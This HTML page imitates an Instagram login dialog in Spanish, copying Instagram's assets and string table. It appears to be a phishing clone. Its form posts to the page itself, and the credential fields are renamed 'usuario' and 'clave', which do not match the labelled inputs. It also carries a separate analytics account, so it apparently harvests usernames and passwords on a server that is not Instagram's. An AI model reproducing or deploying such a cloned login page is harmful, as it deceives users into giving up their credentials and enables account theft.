<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="es" class="hl-es not-logged-in ">
<head>
    <meta charset="UTF-8" />
    <title>Log in &mdash; Instagram</title>

    <meta name="robots" content="noimageindex" />

    <link rel="Shortcut Icon" type="image/x-icon" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/images/ico/favicon.ico" />

    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black" />

    <link rel="apple-touch-icon-precomposed" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/images/ico/apple-touch-icon-precomposed.png" />
    <link rel="apple-touch-icon-precomposed" sizes="72x72" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/images/ico/apple-touch-icon-72x72-precomposed.png" />
    <link rel="apple-touch-icon-precomposed" sizes="114x114" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/images/ico/apple-touch-icon-114x114-precomposed.png" />
    <link rel="apple-touch-icon-precomposed" sizes="144x144" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/images/ico/apple-touch-icon-144x144-precomposed.png" />

    
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0" />
    

    
        <script type="text/javascript" src="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/scripts/jquery.js"></script>
        <script type="text/javascript" src="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/scripts/bluebar.js"></script>

    

    

    <meta id="viewport" name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no, width=device-width">

<script type="text/javascript">
    $(document).ready(function() {
        $("#id_username").focus();
        setTimeout(function() {
            document.getElementById('viewport').setAttribute('content', 'width='+ window.innerWidth + ', user-scalable=no');
        }, 5);
    });
</script>


    
    <link rel="stylesheet" type="text/css" href="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/cache/distillery/dialog-main.css"/>
    <!--[if lt IE 9]>
    <style>
        .dialog-outer {
            min-height: 0;
        }
    </style>
    <![endif]-->


</head>
<body class="p-dialog oauth-login">


<div class="root">

<section class="dialog-outer">
    <div class="dialog">

        <header>
            <h1 class="logo">Instagram</h1>
            
        </header>

        
        
        

        <div class="dialog-main">
            


            <form method="POST" id="login-form" class="adjacent" action="">
                <input type="hidden" name="csrfmiddlewaretoken" value="e8aa2707f5c13e8a02ff5df8e9487537"/>
                <p><label for="id_username">Enter Your Username:</label> <input name="usuario" maxlength="30" autocapitalize="off" autocorrect="off" type="text" id="usuario" /></p>
<p><label for="id_password">Password:</label> <input autocapitalize="off" autocorrect="off" type="password" name="clave" id="clave" /></p>
                <p class="form-actions">
                    <a href="/accounts/password/reset/">Forgot Your Password?</a>
                    <input type="submit" class="button-green" value="Login" />
                </p>
            </form>
        </div>

    </div>
</section>

<script>
    $(window).load(
        function() {
            $("#id_username").focus();
        }
    );
</script>

<div id="reactModalMountPoint"></div>
</div> <!-- .root -->









<script type="text/javascript">
    var _gaq = _gaq || [];
    _gaq.push(['_setAccount', 'UA-58907283-4']);
    _gaq.push(['_setDomainName', 'none']);
    _gaq.push(['_setAllowLinker', true]);
    _gaq.push(["_set", "title", "Login"]);
    _gaq.push(["_setCustomVar", 1, "page", "Login", 3]);

    _gaq.push(['_trackPageview']);
    (function() {
        var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
        ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
        var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
    })();
</script>

        <script type="text/javascript">
window._strings = {

"%(count)s comments": "%(count)s comments",
"%(count)s followers": "%(count)s followers",
"%(count)s following": "%(count)s following",
"%(count)s likes": "%(count)s likes",
"%(count)s more comments": "%(count)s more comments",
"%(count)s new posts": "%(count)s new posts",
"%(count)s people liked this photo": "%(count)s people liked this photo",
"%(count)s photos,": "%(count)s photos,",
"%(count)s posts": "%(count)s posts",
"%(count)s+ new posts": "%(count)s+ new posts",
"%(day)s %(month_name)s %(year)s": "%(day)s %(month_name)s %(year)s",
"%(days)s days ago": "hace %(days)s días",
"%(days)sd": "%(days)sd",
"%(followerCount)s followers": "%(followerCount)s followers",
"%(hours)s hours ago": "hace %(hours)s horas",
"%(hours)sh": "%(hours)sh",
"%(likes)s likes, %(comments)s comments": "%(likes)s likes, %(comments)s comments",
"%(mediaCount)s photos": "%(mediaCount)s photos",
"%(minutes)s minutes ago": "hace %(minutes)s minutos",
"%(minutes)sm": "%(minutes)sm",
"%(months)s months ago": "hace %(months)s meses",
"%(seconds)s seconds ago": "hace %(seconds)s segundos",
"%(seconds)ss": "%(seconds)ss",
"%(user)s on Instagram": "%(user)s on Instagram",
"%(username)s on Instagram": "%(username)s on Instagram",
"%(weeks)s weeks ago": "hace %(weeks)s semanas",
"%(weeks)sw": "%(weeks)ssem",
"%(year)s %(month)s": "%(year)s %(month)s",
"1": "1",
"1 comment": "1 comment",
"1 day ago": "Hace 1 día",
"1 follower": "1 follower",
"1 hour ago": "Hace 1 hora",
"1 like": "1 like",
"1 minute ago": "Hace un minuto",
"1 month ago": "Hace 1 mes",
"1 more comment": "1 more comment",
"1 new post": "1 new post",
"1 photo>": "1 photo\u003E",
"1 second ago": "Hace 1 segundo",
"1 week ago": "Hace 1 semana",
"2": "2",
"3": "3",
"AM": "AM",
"About us": "Acerca de",
"Account Insights - Instagram": "Account Insights \u002D Instagram",
"Add a caption...": "Add a caption...",
"Add a comment": "Add a comment",
"All items loaded": "All items loaded",
"Apr": "Apr",
"April": "Abril",
"Are you sure you want to delete this comment?": "Are you sure you want to delete this comment?",
"Are you sure?": "Are you sure?",
"Audience": "Audience",
"Aug": "Aug",
"August": "Agosto",
"Badges": "Insignias",
"Blog": "Blog",
"By using this embed, you agree to Instagram\\'s <a href=\"http://instagram.com/about/legal/terms/api/\">API Terms of Use</a>.": "By using this embed, you agree to Instagram\u005C\u0027s \u003Ca href\u003D\u0022http://instagram.com/about/legal/terms/api/\u0022\u003EAPI Terms of Use\u003C/a\u003E.",
"Cancel": "Cancelar",
"Content unavailable": "Content unavailable",
"Copy Embed Code": "Copy Embed Code",
"Copy this code:": "Copy this code:",
"Couldn\\'t post comment": "Couldn\u005C\u0027t post comment",
"Dec": "Dec",
"December": "Diciembre",
"Delete": "Eliminar",
"Edit Profile": "Editar el perfil",
"Embed": "Embed",
"Feb": "Feb",
"February": "Febrero",
"Follow": "Seguir",
"Follow %(username)s on Instagram": "Follow %(username)s on Instagram",
"Follow friends and interesting people to see their photos here.": "Follow friends and interesting people to see their photos here.",
"Following": "Eres seguidor(a)",
"Forgot your password?": "Forgot your password?",
"Fri": "Fri",
"Friday": "Friday",
"Here are some suggestions.": "Here are some suggestions.",
"Home": "Inicio",
"Jan": "Jan",
"January": "Enero",
"Jobs": "Empleo",
"Jul": "Jul",
"July": "Julio",
"Jun": "Jun",
"June": "Junio",
"Leave a comment...": "Leave a comment...",
"Like": "Me gusta",
"Likes": "Me gusta",
"Load More...": "Load More...",
"Load more": "Load more",
"Load more...": "Load more...",
"Loading more...": "Loading more...",
"Loading...": "Loading...",
"Log Out": "Salir",
"Log in": "Entrar",
"Mar": "Mar",
"March": "Marzo",
"May": "Mayo",
"Mon": "Mon",
"Monday": "Monday",
"More": "More",
"Next photo": "Next photo",
"No Recent Photos": "No Recent Photos",
"No likes yet.": "Aún no tiene ningún \u0022Me gusta\u0022.",
"No photos to show.": "No photos to show.",
"Nov": "Nov",
"November": "Noviembre",
"Now": "Now",
"Oct": "Oct",
"October": "Octubre",
"Open in App": "Abrir en la aplicación",
"Others": "Others",
"PM": "PM",
"Password:": "Password:",
"Paste it on your website, blog, or wherever you want to link to your profile!": "Paste it on your website, blog, or wherever you want to link to your profile!",
"People you follow": "People you follow",
"Performance": "Performance",
"Photo by %(username)s": "Foto de %(username)s",
"Posts": "Posts",
"Press": "Prensa",
"Press Page - Instagram": "Press Page \u002D Instagram",
"Previous Posts": "Previous Posts",
"Previous photo": "Previous photo",
"Privacy": "Privacidad",
"Report inappropriate": "Report inappropriate",
"Requested": "Solicitud pendiente de aprobación",
"Retry": "Retry",
"Sat": "Sat",
"Saturday": "Saturday",
"Select your badge:": "Select your badge:",
"Sep": "Sep",
"September": "Septiembre",
"Summary": "Summary",
"Sun": "Sun",
"Sunday": "Sunday",
"Support": "Ayuda",
"Terms": "Condiciones",
"This user is private": "Este usuario es privado",
"Thu": "Thu",
"Thursday": "Thursday",
"To follow %(username)s, you need to log in.": "To follow %(username)s, you need to log in.",
"Toggle like": "Toggle like",
"Tue": "Tue",
"Tuesday": "Tuesday",
"Username:": "Username:",
"Video by %(username)s": "Video by %(username)s",
"View Photo Page": "View Photo Page",
"View Profile": "Perfil",
"View Video Page": "View Video Page",
"View on Instagram": "View on Instagram",
"Wed": "Wed",
"Wednesday": "Wednesday",
"When you are finished following people,": "When you are finished following people,",
"Write a comment...": "Write a comment...",
"Yes": "Sí",
"You must log in to add a comment.": "You must log in to add a comment.",
"You must log in to like this photo.": "You must log in to like this photo.",
"You need to be following %(username)s to like or comment": "Debes seguir a %(username)s para comentar o darle a Me gusta",
"Your username or password was incorrect.": "Your username or password was incorrect.",
"am": "am",
"banner photo": "banner photo",
"nd": "nd",
"pm": "pm",
"rd": "rd",
"reload this page": "reload this page",
"st": "st",
"th": "th"
};
</script>
        <script type="text/javascript">window._sharedData = {"entry_data":{},"hostname":"instagram.com","config":{"csrf_token":"e8aa2707f5c13e8a02ff5df8e9487537"},"static_root":"\/\/d36xtkk24g8jdx.cloudfront.net\/bluebar\/07d0b7a"};</script>
<script src="//d36xtkk24g8jdx.cloudfront.net/bluebar/07d0b7a/cache/bundles/webpack-common.js"></script>


</body>
</html>